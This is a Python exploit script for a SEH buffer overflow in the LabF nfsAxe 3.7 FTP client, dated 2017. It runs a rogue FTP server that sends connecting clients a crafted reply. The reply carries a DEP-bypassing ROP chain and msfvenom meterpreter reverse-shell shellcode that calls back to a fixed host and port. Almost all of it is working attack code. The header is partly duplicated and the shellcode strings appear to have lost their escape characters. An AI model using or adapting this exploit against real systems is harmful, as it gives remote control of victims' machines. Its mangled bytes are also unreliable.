LabF nfsAxe FTP Client 3.7 Buffer Overflow

#!/usr/bin/env python
#
# Exploit Title : LabF nfsAxe 3.7 FTP Client (DEP Bypass)
# Date : 12/8/2017
# Exploit Author : wetw0rk
# Vendor Homepage : http: #!/usr/bin/env python
#
# Exploit Title : LabF nfsAxe 3.7 FTP Client (DEP Bypass)
# Date : 12/8/2017
# Exploit Author : wetw0rk
# Vendor Homepage : http://www.labf.com/nfsaxe/nfs-server.html
# Software link : http://www.labf.com/download/nfsaxe.exe
# Version : 3.7
# Tested on : Windows 7 (x86)
# Description : Upon connection the victim is sent a specially crafted buffer
# overwriting the SEH record, resulting in code execution.
#
# Greetz: abatchy17, mvrk, and Dillage (Dilly Dilly)
#
# Trigger the vulnerability by :
# Login as -> [check] anonymous -> connect
#

import struct, socket

host = "0.0.0.0"
port = 21

# msfvenom LHOST=192.168.0.12 LPORT=34 -p windows/meterpreter/reverse_tcp
# -f python -b "x00x0ax10" -v shellcode --smallest
shellcode = ""
shellcode += "x2bxc9x66xb9x18x01xe8xffxffxffxffxc1"
shellcode += "x5ex30x4cx0ex07xe2xfaxfdxeax81x04x05"
shellcode += "x06x67x81xecx3bxcbx68x86x5ex3fx9bx43"
shellcode += "x1ex98x46x01x9dx65x30x16xadx51x3ax2c"
shellcode += "xe1xb3x1cx40x5ex21x08x05xe7xe8x25x28"
shellcode += "xedxc9xdex7fx79xa4x62x21xb9x79x08xbe"
shellcode += "x7ax26x40xdax72x3axedx6cxb5x66x60x40"
shellcode += "x91xc8x0dx5dxa5x7dx01xc2x7exc0x4dx9b"
shellcode += "x7fxb0xfcx90x9dx5ex55x92x6exb7x2dxaf"
shellcode += "x59x26xa4x66x23x7bx15x85x3axe8x3cx41"
shellcode += "x67xb4x0exe2x66x20xe7x35x72x6exa3xfa"
shellcode += "x76xf8x75xa5xffx33x5cx5dx21x20x1dx24"
shellcode += "x24x2ex7fx61xddxdcxdex0ex94x6cx05xd4"
shellcode += "xe2xb8xbex8dx8exe7xe7xe2xa0xccxc0xfd"
shellcode += "xdaxe0xbex9ex65x4ex24x0dx9fx9fxa0x88"
shellcode += "x66xf7xf4xcdx8fx27xc3xa9x55x7exc6xa7"
shellcode += "xc6x6fx18xb1xbexdbxb6xb5xb6x95x31x5f"
shellcode += "xeaxebxecxedxfexefx80x91xaax29xcbx1a"
shellcode += "x26x38x1dx5exa0xdbx9ax9axa6x56x75xa5"
shellcode += "xb3x2cx01x50x16xa3xd4x26x94xd3xa9x31"
shellcode += "xb6x2fx55x43xb4x1cx31x8fxe6x8dxecxbf"
shellcode += "xbdx83xeex34x26xb0x0fx24x79xc5x9exb5"
shellcode += "x9exf7xe8xf9xfaxadx96xfdx96xa7xa4x52"
shellcode += "xe7xfcxd1x96x55x6dx08x5fx59x5cx64x0f"
shellcode += "xd7xc7x4fxeexc7x12xd7x3cxd0x62xf6xda"

def create_rop_chain():
# https://www.corelan.be/index.php/security/corelan-ropdb/
# rop chain generated with mona.py - www.corelan.be
rop_gadgets = [
0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
0xfffffdff, # Value to negate, will become 0x00000201 (dwSize)
0x7c347f98, # RETN (ROP NOP) [msvcr71.dll]
0x7c3415a2, # JMP [EAX] [msvcr71.dll]
0xffffffff, #
0x7c376402, # skip 4 bytes [msvcr71.dll]
0x7c351e05, # NEG EAX # RETN [msvcr71.dll]
0x7c345255, # INC EBX # FPATAN # RETN [msvcr71.dll]
0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]
0x7c344f87, # POP EDX # RETN [msvcr71.dll]
0xffffffc0, # Value to negate, will become 0x00000040
0x7c351eb1, # NEG EDX # RETN [msvcr71.dll]
0x7c34d201, # POP ECX # RETN [msvcr71.dll]
0x7c38b001, # &Writable location [msvcr71.dll]
0x7c347f97, # POP EAX # RETN [msvcr71.dll]
0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
0x7c378c81, # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]
0x7c345c30, # ptr to 'push esp # ret ' [msvcr71.dll]
]
return ''.join(struct.pack('<I', _) for _ in rop_gadgets)

rop_chain = create_rop_chain()
rop_chain += "x90" * 20
rop_chain += shellcode
off2ROP = "B" * 212 # offset to the start of our ROP chain
off2nSEH = "A" * (9391- ( # offset the nSEH and adjustments
len(off2ROP) + len(rop_chain) # account for shellcode and offset
)
)
nSEH = "BBBB" # SEH will be the start of the stack pivot
SEH = struct.pack('<L', 0x68034468) # ADD ESP,61C # POP # POP # POP # POP # POP # RETN [WCMDPA10.dll]
trigger = "C" * (10000 - ( # fill buffer to trigger vulnerability
9399 # offset + nSEH + SEH
)
)

buffer = off2ROP + rop_chain + off2nSEH + nSEH + SEH + trigger
payload = "220 %s is current directory " % (buffer)

try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((host, port))
sock.listen(20)
print("[*] server listening on %s:%d") % (host, port)
except:
print("[-] failed to bind the server exiting...")
exit()

while True:
conn, addr = sock.accept()
print("[*] connection from %s:%d") % (addr[0], addr[1])
print("[+] sending %d bytes to target host" % (len(buffer)))
conn.send('220 Welcome Serv-U FTP Server v6.0 for WinSock ready... ')
conn.recv(1024)
conn.send('331 OK ')
conn.recv(1024)
conn.send('230 OK ')
conn.recv(1024)
conn.send(payload)